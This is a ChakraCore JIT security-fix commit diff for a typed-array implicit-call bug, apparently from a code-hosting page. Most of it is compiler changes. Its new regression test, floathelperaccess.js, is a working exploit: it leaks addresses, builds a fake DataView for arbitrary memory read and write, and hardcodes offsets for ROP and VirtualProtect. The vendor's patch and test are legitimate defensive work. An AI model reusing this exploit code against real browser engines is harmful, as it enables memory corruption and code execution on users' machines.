[CVE-2017-266] Protect store-element to a float typed array from implicit call if BailOutOnArrayAccessHelperCall is set, as that bailout kind indicates that downstream code will assume no side-effects.

pleath · rajatd · commit 9587507cfbc0 · 2017-05-10T09:32:34.000-07:00
diff --git a/lib/Backend/Func.cpp b/lib/Backend/Func.cpp
@@ -322,6 +322,11 @@ Func::Codegen(JitArenaAllocator *alloc, JITTimeWorkItem * workItem,
                 workItem->GetJITFunctionBody()->GetProfileInfo()->DisableSwitchOpt();
                 outputData->disableSwitchOpt = TRUE;
             }
+            else if (ex.Reason() == RejitReason::ArrayCheckHoistDisabled || ex.Reason() == RejitReason::ArrayAccessHelperCallEliminationDisabled)
+            {
+                workItem->GetJITFunctionBody()->GetProfileInfo()->DisableArrayCheckHoist(func.IsLoopBody());
+                outputData->disableArrayCheckHoist = TRUE;
+            }
             else
             {
                 Assert(ex.Reason() == RejitReason::TrackIntOverflowDisabled);
diff --git a/lib/Backend/GlobOpt.cpp b/lib/Backend/GlobOpt.cpp
@@ -20053,6 +20053,12 @@ GlobOpt::DoArrayLengthHoist() const
     return doArrayLengthHoist;
 }
 
+bool
+GlobOpt::DoEliminateArrayAccessHelperCall(Func *const func)
+{
+    return DoArrayCheckHoist(func);
+}
+
 bool
 GlobOpt::DoEliminateArrayAccessHelperCall() const
 {
diff --git a/lib/Backend/GlobOpt.h b/lib/Backend/GlobOpt.h
@@ -1616,6 +1616,7 @@ class GlobOpt
     static bool             DoArrayMissingValueCheckHoist(Func *const func);
     static bool             DoArraySegmentHoist(const ValueType baseValueType, Func *const func);
     static bool             DoArrayLengthHoist(Func *const func);
+    static bool             DoEliminateArrayAccessHelperCall(Func* func);
     static bool             DoTypedArrayTypeSpec(Func* func);
     static bool             DoNativeArrayTypeSpec(Func* func);
     static bool             IsSwitchOptEnabled(Func* func);
diff --git a/lib/Backend/JITTimeProfileInfo.cpp b/lib/Backend/JITTimeProfileInfo.cpp
@@ -143,6 +143,12 @@ JITTimeProfileInfo::DisableAggressiveIntTypeSpec(bool isLoopBody)
     m_profileData.flags |= isLoopBody ? Flags_disableAggressiveIntTypeSpec_jitLoopBody : Flags_disableAggressiveIntTypeSpec;
 }
 
+void
+JITTimeProfileInfo::DisableArrayCheckHoist(bool isLoopBody)
+{
+    m_profileData.flags |= isLoopBody ? Flags_disableArrayCheckHoist_jitLoopBody : Flags_disableArrayCheckHoist;
+}
+
 void
 JITTimeProfileInfo::DisableStackArgOpt()
 {
diff --git a/lib/Backend/JITTimeProfileInfo.h b/lib/Backend/JITTimeProfileInfo.h
@@ -40,6 +40,7 @@ class JITTimeProfileInfo
     void DisableStackArgOpt();
     void DisableSwitchOpt();
     void DisableTrackCompoundedIntOverflow();
+    void DisableArrayCheckHoist(bool isLoopBody);
 
     bool IsModulusOpByPowerOf2(Js::ProfileId profileId) const;
     bool IsAggressiveIntTypeSpecDisabled(const bool isJitLoopBody) const;
diff --git a/lib/Backend/Lower.cpp b/lib/Backend/Lower.cpp
@@ -16874,16 +16874,18 @@ Lowerer::GenerateFastStElemI(IR::Instr *& stElem, bool *instrIsInHelperBlockRef)
                 const IR::AutoReuseOpnd autoReuseReg(reg, m_func);
                 InsertMove(reg, src, stElem);
 
+                bool bailOutOnHelperCall = stElem->HasBailOutInfo() && (stElem->GetBailOutKind() & IR::BailOutOnArrayAccessHelperCall);
+
                 // Convert to float, and assign to indirOpnd
                 if (baseValueType.IsLikelyOptimizedVirtualTypedArray())
                 {
                     IR::RegOpnd* dstReg = IR::RegOpnd::New(indirOpnd->GetType(), this->m_func);
-                    m_lowererMD.EmitLoadFloat(dstReg, reg, stElem);
+                    m_lowererMD.EmitLoadFloat(dstReg, reg, stElem, bailOutOnHelperCall);
                     InsertMove(indirOpnd, dstReg, stElem);
                 }
                 else
                 {
-                    m_lowererMD.EmitLoadFloat(indirOpnd, reg, stElem);
+                    m_lowererMD.EmitLoadFloat(indirOpnd, reg, stElem, bailOutOnHelperCall);
                 }
 
             }
diff --git a/lib/Backend/LowerMDShared.cpp b/lib/Backend/LowerMDShared.cpp
@@ -6645,7 +6645,7 @@ LowererMD::EmitLoadFloatCommon(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertIn
 }
 
 IR::RegOpnd *
-LowererMD::EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr)
+LowererMD::EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr, bool bailOutOnHelperCall)
 {
     IR::LabelInstr *labelDone;
     IR::Instr *instr;
@@ -6657,6 +6657,23 @@ LowererMD::EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr)
         return nullptr;
     }
 
+    if (bailOutOnHelperCall)
+    {
+        if(!GlobOpt::DoEliminateArrayAccessHelperCall(this->m_func))
+        {
+            // Array access helper call removal is already off for some reason. Prevent trying to rejit again
+            // because it won't help and the same thing will happen again. Just abort jitting this function.
+            if(PHASE_TRACE(Js::BailOutPhase, this->m_func))
+            {
+                Output::Print(_u("    Aborting JIT because EliminateArrayAccessHelperCall is already off\n"));
+                Output::Flush();
+            }
+            throw Js::OperationAbortedException();
+        }
+
+        throw Js::RejitException(RejitReason::ArrayAccessHelperCallEliminationDisabled);
+    }
+
     IR::Opnd *memAddress = dst;
 
     if (dst->IsRegOpnd())
diff --git a/lib/Backend/LowerMDShared.h b/lib/Backend/LowerMDShared.h
@@ -222,7 +222,7 @@ class LowererMD
             static IR::Instr *InsertConvertFloat64ToInt32(const RoundMode roundMode, IR::Opnd *const dst, IR::Opnd *const src, IR::Instr *const insertBeforeInstr);
             void            ConvertFloatToInt32(IR::Opnd* intOpnd, IR::Opnd* floatOpnd, IR::LabelInstr * labelHelper, IR::LabelInstr * labelDone, IR::Instr * instInsert);
             void            EmitLoadFloatFromNumber(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr);
-            IR::RegOpnd *   EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr);
+            IR::RegOpnd *   EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr, bool bailOutOnHelperCall = false);
             static void     EmitNon32BitOvfCheck(IR::Instr *instr, IR::Instr *insertInstr, IR::LabelInstr* bailOutLabel);
 
             static void     LowerInt4NegWithBailOut(IR::Instr *const instr, const IR::BailOutKind bailOutKind, IR::LabelInstr *const bailOutLabel, IR::LabelInstr *const skipBailOutLabel);
diff --git a/lib/Backend/NativeCodeGenerator.cpp b/lib/Backend/NativeCodeGenerator.cpp
@@ -1135,6 +1135,10 @@ NativeCodeGenerator::CodeGen(PageAllocator * pageAllocator, CodeGenWorkItem* wor
 
     if (body->HasDynamicProfileInfo())
     {
+        if (jitWriteData.disableArrayCheckHoist)
+        {
+            body->GetAnyDynamicProfileInfo()->DisableArrayCheckHoist(workItem->Type() == JsLoopBodyWorkItemType);
+        }
         if (jitWriteData.disableAggressiveIntTypeSpec)
         {
             body->GetAnyDynamicProfileInfo()->DisableAggressiveIntTypeSpec(workItem->Type() == JsLoopBodyWorkItemType);
diff --git a/lib/Backend/amd64/LowererMDArch.cpp b/lib/Backend/amd64/LowererMDArch.cpp
@@ -2748,19 +2748,19 @@ LowererMDArch::EmitLoadInt32(IR::Instr *instrLoad, bool conversionFromObjectAllo
         // Known to be non-integer. If we are required to bail out on helper call, just re-jit.
         if (!doFloatToIntFastPath && bailOutOnHelper)
         {
-            if(!GlobOpt::DoAggressiveIntTypeSpec(this->m_func))
+            if(!GlobOpt::DoEliminateArrayAccessHelperCall(this->m_func))
             {
-                // Aggressive int type specialization is already off for some reason. Prevent trying to rejit again
+                // Array access helper call removal is already off for some reason. Prevent trying to rejit again
                 // because it won't help and the same thing will happen again. Just abort jitting this function.
                 if(PHASE_TRACE(Js::BailOutPhase, this->m_func))
                 {
-                    Output::Print(_u("    Aborting JIT because AggressiveIntTypeSpec is already off\n"));
+                    Output::Print(_u("    Aborting JIT because EliminateArrayAccessHelperCall is already off\n"));
                     Output::Flush();
                 }
                 throw Js::OperationAbortedException();
             }
 
-            throw Js::RejitException(RejitReason::AggressiveIntTypeSpecDisabled);
+            throw Js::RejitException(RejitReason::ArrayAccessHelperCallEliminationDisabled);
         }
     }
     else
diff --git a/lib/Backend/arm/LowerMD.cpp b/lib/Backend/arm/LowerMD.cpp
@@ -6143,7 +6143,7 @@ LowererMD::EmitLoadFloatCommon(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertIn
 }
 
 IR::RegOpnd *
-LowererMD::EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr)
+LowererMD::EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr, bool bailOutOnHelperCall)
 {
     IR::LabelInstr *labelDone;
     IR::Instr *instr;
@@ -6165,6 +6165,23 @@ LowererMD::EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr)
         return nullptr;
     }
 
+    if (bailOutOnHelperCall)
+    {
+        if(!GlobOpt::DoEliminateArrayAccessHelperCall(this->m_func))
+        {
+            // Array access helper call removal is already off for some reason. Prevent trying to rejit again
+            // because it won't help and the same thing will happen again. Just abort jitting this function.
+            if(PHASE_TRACE(Js::BailOutPhase, this->m_func))
+            {
+                Output::Print(_u("    Aborting JIT because EliminateArrayAccessHelperCall is already off\n"));
+                Output::Flush();
+            }
+            throw Js::OperationAbortedException();
+        }
+
+        throw Js::RejitException(RejitReason::ArrayAccessHelperCallEliminationDisabled);
+    }
+
     IR::Opnd *memAddress = dst;
     if (dst->IsRegOpnd())
     {
@@ -7385,19 +7402,19 @@ LowererMD::EmitLoadInt32(IR::Instr *instrLoad, bool conversionFromObjectAllowed,
             // Known to be non-integer. If we are required to bail out on helper call, just re-jit.
             if (!doFloatToIntFastPath && bailOutOnHelper)
             {
-                if(!GlobOpt::DoAggressiveIntTypeSpec(this->m_func))
+                if(!GlobOpt::DoEliminateArrayAccessHelperCall(this->m_func))
                 {
-                    // Aggressive int type specialization is already off for some reason. Prevent trying to rejit again
+                    // Array access helper call removal is already off for some reason. Prevent trying to rejit again
                     // because it won't help and the same thing will happen again. Just abort jitting this function.
                     if(PHASE_TRACE(Js::BailOutPhase, this->m_func))
                     {
-                        Output::Print(_u("    Aborting JIT because AggressiveIntTypeSpec is already off\n"));
+                        Output::Print(_u("    Aborting JIT because EliminateArrayAccessHelperCall is already off\n"));
                         Output::Flush();
                     }
                     throw Js::OperationAbortedException();
                 }
 
-                throw Js::RejitException(RejitReason::AggressiveIntTypeSpecDisabled);
+                throw Js::RejitException(RejitReason::ArrayAccessHelperCallEliminationDisabled);
             }
         }
         else
diff --git a/lib/Backend/arm/LowerMD.h b/lib/Backend/arm/LowerMD.h
@@ -155,7 +155,7 @@ class LowererMD
             void            GenerateNumberAllocation(IR::RegOpnd * opndDst, IR::Instr * instrInsert, bool isHelper);
             void            GenerateFastRecyclerAlloc(size_t allocSize, IR::RegOpnd* newObjDst, IR::Instr* insertionPointInstr, IR::LabelInstr* allocHelperLabel, IR::LabelInstr* allocDoneLabel);
             void            SaveDoubleToVar(IR::RegOpnd * dstOpnd, IR::RegOpnd *opndFloat, IR::Instr *instrOrig, IR::Instr *instrInsert, bool isHelper = false);
-            IR::RegOpnd *   EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr);
+            IR::RegOpnd *   EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr, bool bailOutOnHelperCall = false);
             IR::Instr *     LoadCheckedFloat(IR::RegOpnd *opndOrig, IR::RegOpnd *opndFloat, IR::LabelInstr *labelInline, IR::LabelInstr *labelHelper, IR::Instr *instrInsert, const bool checkForNullInLoopBody = false);
 
             void LoadFloatValue(IR::RegOpnd * javascriptNumber, IR::RegOpnd * opndFloat, IR::LabelInstr * labelHelper, IR::Instr * instrInsert, const bool checkFornullptrInLoopBody = false);
diff --git a/lib/Backend/arm64/LowerMD.h b/lib/Backend/arm64/LowerMD.h
@@ -152,7 +152,7 @@ class LowererMD
               void            GenerateNumberAllocation(IR::RegOpnd * opndDst, IR::Instr * instrInsert, bool isHelper) { __debugbreak(); }
               void            GenerateFastRecyclerAlloc(size_t allocSize, IR::RegOpnd* newObjDst, IR::Instr* insertionPointInstr, IR::LabelInstr* allocHelperLabel, IR::LabelInstr* allocDoneLabel) { __debugbreak(); }
               void            SaveDoubleToVar(IR::RegOpnd * dstOpnd, IR::RegOpnd *opndFloat, IR::Instr *instrOrig, IR::Instr *instrInsert, bool isHelper = false) { __debugbreak(); }
-              IR::RegOpnd *   EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr) { __debugbreak(); return 0; }
+              IR::RegOpnd *   EmitLoadFloat(IR::Opnd *dst, IR::Opnd *src, IR::Instr *insertInstr, bool bailOutOnHelperCall = false) { __debugbreak(); return 0; }
               IR::Instr *     LoadCheckedFloat(IR::RegOpnd *opndOrig, IR::RegOpnd *opndFloat, IR::LabelInstr *labelInline, IR::LabelInstr *labelHelper, IR::Instr *instrInsert) { __debugbreak(); return 0; }
 
               void LoadFloatValue(IR::RegOpnd * javascriptNumber, IR::RegOpnd * opndFloat, IR::LabelInstr * labelHelper, IR::Instr * instrInsert) { __debugbreak(); }
diff --git a/lib/Backend/i386/LowererMDArch.cpp b/lib/Backend/i386/LowererMDArch.cpp
@@ -2672,19 +2672,19 @@ LowererMDArch::EmitLoadInt32(IR::Instr *instrLoad, bool conversionFromObjectAllo
         // Known to be non-integer. If we are required to bail out on helper call, just re-jit.
         if (!doFloatToIntFastPath && bailOutOnHelper)
         {
-            if(!GlobOpt::DoAggressiveIntTypeSpec(this->m_func))
+            if(!GlobOpt::DoEliminateArrayAccessHelperCall(this->m_func))
             {
-                // Aggressive int type specialization is already off for some reason. Prevent trying to rejit again
+                // Array access helper call removal is already off for some reason. Prevent trying to rejit again
                 // because it won't help and the same thing will happen again. Just abort jitting this function.
                 if(PHASE_TRACE(Js::BailOutPhase, this->m_func))
                 {
-                    Output::Print(_u("    Aborting JIT because AggressiveIntTypeSpec is already off\n"));
+                    Output::Print(_u("    Aborting JIT because EliminateArrayAccessHelperCall is already off\n"));
                     Output::Flush();
                 }
                 throw Js::OperationAbortedException();
             }
 
-            throw Js::RejitException(RejitReason::AggressiveIntTypeSpecDisabled);
+            throw Js::RejitException(RejitReason::ArrayAccessHelperCallEliminationDisabled);
         }
     }
     else
diff --git a/lib/Common/Common/RejitReasons.h b/lib/Common/Common/RejitReasons.h
@@ -28,6 +28,7 @@ REJIT_REASON(FailedEquivalentFixedFieldTypeCheck)
 REJIT_REASON(CtorGuardInvalidated)
 REJIT_REASON(ArrayCheckHoistDisabled)
 REJIT_REASON(ArrayMissingValueCheckHoistDisabled)
+REJIT_REASON(ArrayAccessHelperCallEliminationDisabled)
 REJIT_REASON(ExpectingNativeArray)
 REJIT_REASON(ConvertedNativeArray)
 REJIT_REASON(ArrayAccessNeededHelperCall)
diff --git a/lib/JITIDL/JITTypes.h b/lib/JITIDL/JITTypes.h
@@ -763,6 +763,7 @@ typedef struct NativeDataBuffer
 // Fields that JIT modifies
 typedef struct JITOutputIDL
 {
+    boolean disableArrayCheckHoist;
     boolean disableAggressiveIntTypeSpec;
     boolean disableInlineApply;
     boolean disableInlineSpread;
@@ -775,8 +776,6 @@ typedef struct JITOutputIDL
 
     boolean hasJittedStackClosure;
 
-    IDL_PAD1(0)
-
     unsigned short pdataCount;
     unsigned short xdataSize;
 
diff --git a/test/typedarray/floathelperaccess.js b/test/typedarray/floathelperaccess.js
@@ -0,0 +1,116 @@
+	var evil_array = new Array(0x38/*dataview type id*/,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0);
+	g_lo = 0;
+	g_hi = 0;
+	var b = [1.1,2.2];
+	dv = new DataView(new ArrayBuffer(8));
+	
+	var vt_to_chakrabase = 0x592d88;
+	var chakrabase_to_threadCtxPtr = 0x735eb0;
+	var chakrabase_to_retPtr = 0x1ca99d;
+	var chakrabase_to_rop = 0x1028e5;
+	var chakrabase_to_vp = 0x1028bb;
+	
+	function read_obj_address(a,gg,c,d){
+		a[0] = 1.2;
+		try{gg[d] = c} catch(e) {}
+		a[1] = 2.2;
+		return a[0];
+	}
+	
+	function float_to_uint(num){
+		f = new Float64Array(1);
+		f[0] = num;
+		uint = new Uint32Array(f.buffer);
+		return uint[1] * 0x100000000 + uint[0];
+	}
+	function uint_to_float(lo,hi){
+		u = new Uint32Array(2);
+		u[0] = lo;
+		u[1] = hi;
+		g_lo = u[0];
+		g_hi = u[1];
+		f = new Float64Array(u.buffer);
+		return f[0];
+	}
+	function fake_dataview(lo,hi){
+		int_lo  = lo > 0x80000000? -(0x100000000-lo):lo;
+		evil_array[0] = 0x38;
+		evil_array[1] = 0;
+	
+		evil_array[2] = int_lo;
+		evil_array[3] = hi;
+		
+		evil_array[4] = 0;
+		evil_array[5] = 0;
+		evil_array[6] = 0;
+		evil_array[7] = 0;
+		
+		evil_array[8] = 0x200;
+		
+		evil_array[9] = 0;
+		
+		evil_array[10] = int_lo - 0x38;
+		evil_array[11] = hi;
+		
+		evil_array[12] = 0;
+		evil_array[13] = 0;
+		
+		//alert(evil_array[8].toString(16))
+		evil_array[14] = 0x41414141;
+		evil_array[15] = 0x42424242;
+		//Array.prototype.slice.call(evil_array);
+	}
+	function Read32(addr){
+		evil_array[14] = addr & 0xffffffff;
+		evil_array[15] = Math.floor(addr / 0x100000000);
+		return dv.getUint32.call(evil_dv,0,true);
+	}
+	function Write32(addr,data){
+		evil_array[14] = addr & 0xffffffff;
+		evil_array[15] = Math.floor(addr / 0x100000000);
+		dv.setUint32.call(evil_dv,0,data,true);
+	}
+	function Read64(addr){
+		evil_array[14] = addr & 0xffffffff;
+		evil_array[15] = Math.floor(addr / 0x100000000);
+		result = dv.getUint32.call(evil_dv,0,true) + dv.getUint32.call(evil_dv,4,true) * 0x100000000;
+		return result;
+	}
+	function Write64(addr,data_lo,data_hi){
+		evil_array[14] = addr & 0xffffffff;
+		evil_array[15] = Math.floor(addr / 0x100000000);
+		dv.setUint32.call(evil_dv,0,data_lo,true);
+		dv.setUint32.call(evil_dv,4,data_hi,true);
+	}
+	function main(){
+		var a =[1.1,2.2];
+		var gg = new Float64Array(100);
+		for(var i = 0;i < 0x10000;i++){
+			read_obj_address(a,gg,1.1+i,4);
+		}
+		evil = {valueOf: () => {
+				a[0] = evil_array;    //leak any object address
+				return 0;
+				}}
+		
+		evil_array_slots_address = float_to_uint(read_obj_address(a,gg,evil,4))+0x58;
+		
+		var fake_obj_address = uint_to_float(evil_array_slots_address & 0xffffffff,Math.floor(evil_array_slots_address / 0x100000000)).toString();
+		var fake_obj_str = "function fake_obj(b,gg,c,d){b[0] = 1.333;try{gg[d] = c} catch(e) {};b[1] = 2.22222222;b[0] = " + fake_obj_address +";}";
+		eval(fake_obj_str);
+		
+		
+		for(var i = 0;i < 0x10000;i++){
+			fake_obj(b,gg,1.1+i,4);
+		}
+		evil2 = {valueOf: () => {
+				b[0] = {};
+				return 0;
+				}}
+		fake_dataview(g_lo,g_hi);
+		fake_obj(b,gg,evil2,4);
+		evil_dv = b[0];
+	}
+	main();
+
+        WScript.Echo('pass');
diff --git a/test/typedarray/rlexe.xml b/test/typedarray/rlexe.xml

Original file line number	Diff line number	Diff line change
`@@ -322,6 +322,11 @@ Func::Codegen(JitArenaAllocator alloc, JITTimeWorkItem workItem,`
`322`	`322`	`workItem->GetJITFunctionBody()->GetProfileInfo()->DisableSwitchOpt();`
`323`	`323`	`outputData->disableSwitchOpt = TRUE;`
`324`	`324`	`}`
	`325`	`+ else if (ex.Reason() == RejitReason::ArrayCheckHoistDisabled \|\| ex.Reason() == RejitReason::ArrayAccessHelperCallEliminationDisabled)`
	`326`	`+ {`
	`327`	`+ workItem->GetJITFunctionBody()->GetProfileInfo()->DisableArrayCheckHoist(func.IsLoopBody());`
	`328`	`+ outputData->disableArrayCheckHoist = TRUE;`
	`329`	`+ }`
`325`	`330`	`else`
`326`	`331`	`{`
`327`	`332`	`Assert(ex.Reason() == RejitReason::TrackIntOverflowDisabled);`
Original file line number	Diff line number	Diff line change
`@@ -20053,6 +20053,12 @@ GlobOpt::DoArrayLengthHoist() const`
`20053`	`20053`	`return doArrayLengthHoist;`
`20054`	`20054`	`}`
`20055`	`20055`
	`20056`	`+bool`
	`20057`	`+GlobOpt::DoEliminateArrayAccessHelperCall(Func *const func)`
	`20058`	`+{`
	`20059`	`+ return DoArrayCheckHoist(func);`
	`20060`	`+}`
	`20061`	`+`
`20056`	`20062`	`bool`
`20057`	`20063`	`GlobOpt::DoEliminateArrayAccessHelperCall() const`
`20058`	`20064`	`{`
Original file line number	Diff line number	Diff line change
`@@ -143,6 +143,12 @@ JITTimeProfileInfo::DisableAggressiveIntTypeSpec(bool isLoopBody)`
`143`	`143`	`m_profileData.flags \|= isLoopBody ? Flags_disableAggressiveIntTypeSpec_jitLoopBody : Flags_disableAggressiveIntTypeSpec;`
`144`	`144`	`}`
`145`	`145`
	`146`	`+void`
	`147`	`+JITTimeProfileInfo::DisableArrayCheckHoist(bool isLoopBody)`
	`148`	`+{`
	`149`	`+ m_profileData.flags \|= isLoopBody ? Flags_disableArrayCheckHoist_jitLoopBody : Flags_disableArrayCheckHoist;`
	`150`	`+}`
	`151`	`+`
`146`	`152`	`void`
`147`	`153`	`JITTimeProfileInfo::DisableStackArgOpt()`
`148`	`154`	`{`
Original file line number	Diff line number	Diff line change
`@@ -16874,16 +16874,18 @@ Lowerer::GenerateFastStElemI(IR::Instr & stElem, bool instrIsInHelperBlockRef)`
`16874`	`16874`	`const IR::AutoReuseOpnd autoReuseReg(reg, m_func);`
`16875`	`16875`	`InsertMove(reg, src, stElem);`
`16876`	`16876`
	`16877`	`+ bool bailOutOnHelperCall = stElem->HasBailOutInfo() && (stElem->GetBailOutKind() & IR::BailOutOnArrayAccessHelperCall);`
	`16878`	`+`
`16877`	`16879`	`// Convert to float, and assign to indirOpnd`
`16878`	`16880`	`if (baseValueType.IsLikelyOptimizedVirtualTypedArray())`
`16879`	`16881`	`{`
`16880`	`16882`	`IR::RegOpnd* dstReg = IR::RegOpnd::New(indirOpnd->GetType(), this->m_func);`
`16881`		`- m_lowererMD.EmitLoadFloat(dstReg, reg, stElem);`
	`16883`	`+ m_lowererMD.EmitLoadFloat(dstReg, reg, stElem, bailOutOnHelperCall);`
`16882`	`16884`	`InsertMove(indirOpnd, dstReg, stElem);`
`16883`	`16885`	`}`
`16884`	`16886`	`else`
`16885`	`16887`	`{`
`16886`		`- m_lowererMD.EmitLoadFloat(indirOpnd, reg, stElem);`
	`16888`	`+ m_lowererMD.EmitLoadFloat(indirOpnd, reg, stElem, bailOutOnHelperCall);`
`16887`	`16889`	`}`
`16888`	`16890`
`16889`	`16891`	`}`
Original file line number	Diff line number	Diff line change
`@@ -1135,6 +1135,10 @@ NativeCodeGenerator::CodeGen(PageAllocator * pageAllocator, CodeGenWorkItem* wor`
`1135`	`1135`
`1136`	`1136`	`if (body->HasDynamicProfileInfo())`
`1137`	`1137`	`{`
	`1138`	`+ if (jitWriteData.disableArrayCheckHoist)`
	`1139`	`+ {`
	`1140`	`+ body->GetAnyDynamicProfileInfo()->DisableArrayCheckHoist(workItem->Type() == JsLoopBodyWorkItemType);`
	`1141`	`+ }`
`1138`	`1142`	`if (jitWriteData.disableAggressiveIntTypeSpec)`
`1139`	`1143`	`{`
`1140`	`1144`	`body->GetAnyDynamicProfileInfo()->DisableAggressiveIntTypeSpec(workItem->Type() == JsLoopBodyWorkItemType);`
Original file line number	Diff line number	Diff line change
`@@ -2748,19 +2748,19 @@ LowererMDArch::EmitLoadInt32(IR::Instr *instrLoad, bool conversionFromObjectAllo`
`2748`	`2748`	`// Known to be non-integer. If we are required to bail out on helper call, just re-jit.`
`2749`	`2749`	`if (!doFloatToIntFastPath && bailOutOnHelper)`
`2750`	`2750`	`{`
`2751`		`- if(!GlobOpt::DoAggressiveIntTypeSpec(this->m_func))`
	`2751`	`+ if(!GlobOpt::DoEliminateArrayAccessHelperCall(this->m_func))`
`2752`	`2752`	`{`
`2753`		`- // Aggressive int type specialization is already off for some reason. Prevent trying to rejit again`
	`2753`	`+ // Array access helper call removal is already off for some reason. Prevent trying to rejit again`
`2754`	`2754`	`// because it won't help and the same thing will happen again. Just abort jitting this function.`
`2755`	`2755`	`if(PHASE_TRACE(Js::BailOutPhase, this->m_func))`
`2756`	`2756`	`{`
`2757`		`- Output::Print(_u(" Aborting JIT because AggressiveIntTypeSpec is already off\n"));`
	`2757`	`+ Output::Print(_u(" Aborting JIT because EliminateArrayAccessHelperCall is already off\n"));`
`2758`	`2758`	`Output::Flush();`
`2759`	`2759`	`}`
`2760`	`2760`	`throw Js::OperationAbortedException();`
`2761`	`2761`	`}`
`2762`	`2762`
`2763`		`- throw Js::RejitException(RejitReason::AggressiveIntTypeSpecDisabled);`
	`2763`	`+ throw Js::RejitException(RejitReason::ArrayAccessHelperCallEliminationDisabled);`
`2764`	`2764`	`}`
`2765`	`2765`	`}`
`2766`	`2766`	`else`